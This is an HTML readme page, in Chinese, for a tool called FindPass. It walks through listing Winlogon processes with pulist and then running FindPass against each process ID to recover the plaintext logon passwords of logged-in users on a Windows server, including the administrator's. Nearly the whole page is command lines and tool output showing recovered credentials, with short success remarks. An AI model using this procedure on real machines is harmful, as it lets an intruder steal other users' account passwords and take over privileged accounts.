📄 findpass.readme.html
字号:
<font face="Fixedsys">*** </font></font><font face="Fixedsys" color="#80C050">4)
用findpass与之前获得的相应信息获得各登陆会话的用户密码。</font><font face="Fixedsys"><br>
</font><font face="Fixedsys"><font color="#80C050"></font>C:\Documents and Settings\bingle></font><font face="Fixedsys">FindPass.exe binglesite administrator 248<br>
<br>
To Find Password in the Winlogon process<br>
Usage: FindPass.exe DomainName UserName PID-of-WinLogon<br>
<br>
The debug privilege has been added to PasswordReminder.<br>
The WinLogon process id is 1128 (0x00000468).<br>
To find binglesite\administrator password in process 1128 ...<br>
The encoded password is found at 0x007b0800 and has a length of 7.<br>
The logon information is: binglesite/administrator/xxxxxxx.<br>
The hash byte is: 0xf1.</font><font color="#80C050"><font face="Fixedsys"><br>
*** got it</font></font><p style='line-height:160%'><font face="Fixedsys"><font color="#80C050"></font>C:\Documents and Settings\bingle></font><font face="Fixedsys">FindPass.exe
binglesite bingle 1260<br>
<br>
To Find Password in the Winlogon process<br>
Usage: FindPass.exe DomainName UserName PID-of-WinLogon<br>
<br>
The debug privilege has been added to PasswordReminder.<br>
The WinLogon process id is 1260 (0x000004ec).<br>
To find binglesite\bingle password in process 1260 ...<br>
The encoded password is found at 0x007b0800 and has a length of 6.<br>
The logon information is: binglesite/bingle/bingle.<br>
The hash byte is: 0xa9.<br>
</font><font color="#80C050"><font face="Fixedsys">*** got it</font></font><font face="Fixedsys">
<br>
<br>
<font color="#00CC00">(3) 只使用pulist<br>
1) </font> pulist,找到系统里登陆的域名和用户名,及winlogon进程id <br>
<font color="#00CC00">2) </font> 然后给每个winlogon进程id查找所有的用户。<br>
<br>
<font color="#80C050">*** 1) pulist,找到系统里登陆的域名和用户名,及winlogon进程id </font><br>
C:\Documents and Settings\bingle>pulist <br>
Process PID User <br>
Idle 0 <br>
System 8 <br>
smss.exe 164 NT AUTHORITY\SYSTEM <br>
csrss.exe 192 NT AUTHORITY\SYSTEM <br>
winlogon.exe 188 NT AUTHORITY\SYSTEM <br>
wins.exe 1212 NT AUTHORITY\SYSTEM <br>
Explorer.exe 388 TEST-2KSERVER\Administrator <br>
internat.exe 1828 TEST-2KSERVER\Administrator <br>
conime.exe 1868 TEST-2KSERVER\Administrator <br>
msiexec.exe 1904 NT AUTHORITY\SYSTEM <br>
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM <br>
taskmgr.exe 1752 TEST-2KSERVER\Administrator <br>
csrss.exe 2056 NT AUTHORITY\SYSTEM <br>
winlogon.exe 2416 NT AUTHORITY\SYSTEM <br>
rdpclip.exe 2448 TEST-2KSERVER\clovea <br>
Explorer.exe 2408 TEST-2KSERVER\clovea <br>
internat.exe 1480 TEST-2KSERVER\clovea <br>
cmd.exe 2508 TEST-2KSERVER\Administrator <br>
ntshell.exe 368 TEST-2KSERVER\Administrator <br>
ntshell.exe 1548 TEST-2KSERVER\Administrator <br>
ntshell.exe 1504 TEST-2KSERVER\Administrator <br>
csrss.exe 1088 NT AUTHORITY\SYSTEM <br>
winlogon.exe 1876 NT AUTHORITY\SYSTEM <br>
rdpclip.exe 1680 TEST-2KSERVER\bingle <br>
Explorer.exe 2244 TEST-2KSERVER\bingle <br>
conime.exe 2288 TEST-2KSERVER\bingle <br>
internat.exe 1592 TEST-2KSERVER\bingle <br>
cmd.exe 1692 TEST-2KSERVER\bingle <br>
mdm.exe 2476 TEST-2KSERVER\bingle <br>
taskmgr.exe 752 TEST-2KSERVER\bingle <br>
pulist.exe 2532 TEST-2KSERVER\bingle <br>
<br>
<font color="#80C050">*** 2) 然后给每个winlogon进程id查找所有的用户。<br>
</font>C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER <br>
administrator 188 <br>
<br>
To Find Password in the Winlogon process <br>
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon <br>
<br>
The debug privilege has been added to PasswordReminder. <br>
The WinLogon process id is 188 (0x000000bc). <br>
To find TEST-2KSERVER\administrator password in process 188 ... <br>
The encoded password is found at 0x008e0800 and has a length of 10. <br>
The logon information is: TEST-2KSERVER/administrator/testserver. <br>
The hash byte is: 0x13. <br>
<font color="#80C050">*** 运气好,一下就找到一个。<br>
</font><br>
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER <br>
clovea 1876 <br>
<br>
To Find Password in the Winlogon process <br>
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon <br>
<br>
The debug privilege has been added to PasswordReminder. <br>
The WinLogon process id is 1876 (0x00000754). <br>
To find TEST-2KSERVER\clovea password in process 1876 ... <br>
PasswordReminder is unable to find the password in memory. <br>
<font color="#80C050">*** 看来这个winlogon不是这个用户的<br>
</font><br>
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER <br>
bingle 1876 <br>
<br>
To Find Password in the Winlogon process <br>
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon <br>
<br>
The debug privilege has been added to PasswordReminder. <br>
The WinLogon process id is 1876 (0x00000754). <br>
To find TEST-2KSERVER\bingle password in process 1876 ... <br>
The logon information is: TEST-2KSERVER/bingle. <br>
There is no password. <br>
<font color="#80C050">*** 看来这个winlogon是这个用户的<br>
</font><br>
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER <br>
clovea 2416 <br>
<br>
To Find Password in the Winlogon process <br>
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon <br>
<br>
The debug privilege has been added to PasswordReminder. <br>
The WinLogon process id is 2416 (0x00000970). <br>
To find TEST-2KSERVER\clovea password in process 2416 ... <br>
The logon information is: TEST-2KSERVER/clovea. <br>
There is no password. <br>
<font color="#80C050">*** 这个winlogon才是这个用户的<br>
</font>C:\Documents and Settings\bingle> <br>
</font>
<p class=MsoNormal style='line-height:160%'>
<hr size="1" noshade color="#FFFF00" width="90%">
<p align="center"><font face="Fixedsys">与我联系:<a href="mailto:bingle@email.com.cn">bingle@email.com.cn</a>
, 欢迎到<a href="bbs.html" target="_blank">我的留言簿</a></font></p>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -